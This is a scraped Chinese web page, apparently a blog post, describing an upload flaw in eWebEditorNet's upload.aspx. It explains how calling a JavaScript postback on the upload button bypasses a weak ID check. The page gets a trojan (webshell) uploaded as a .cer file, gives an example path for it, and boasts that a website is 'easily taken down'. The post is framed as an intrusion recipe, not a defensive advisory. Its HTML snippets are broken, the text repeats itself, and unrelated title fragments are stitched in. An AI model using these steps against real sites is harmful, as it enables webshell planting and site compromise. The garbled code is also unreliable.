如何正确使用h1标签以图片表示你的博客标
Win2003(iis6)+SQUID用
eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。
原理:
代码
只是简单的对ID进行验证,只要构造javascript:lbtnUpload.click();满足条件达到上传木马的效果。成功以后查看源代码
代码
木马的具体地址为
/eWebEditorNet/UploadFile/200801141044412198.cer
这样就轻松的拿下了一个网站。
分享按钮
原理:
代码
<form id="post" encType="server">
"uploadfile" style="file" size="uploadfile" runat=
"lbtnUpload" runat=
"JavaScript">
"uploadfile" style="file" size="uploadfile" runat=
"lbtnUpload" runat=
"JavaScript">
只是简单的对ID进行验证,只要构造javascript:lbtnUpload.click();满足条件达到上传木马的效果。成功以后查看源代码
代码
a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"</>script 'javascript'</>
木马的具体地址为
/eWebEditorNet/UploadFile/200801141044412198.cer
这样就轻松的拿下了一个网站。
分享按钮
From: 本站原创
已经有1个回复
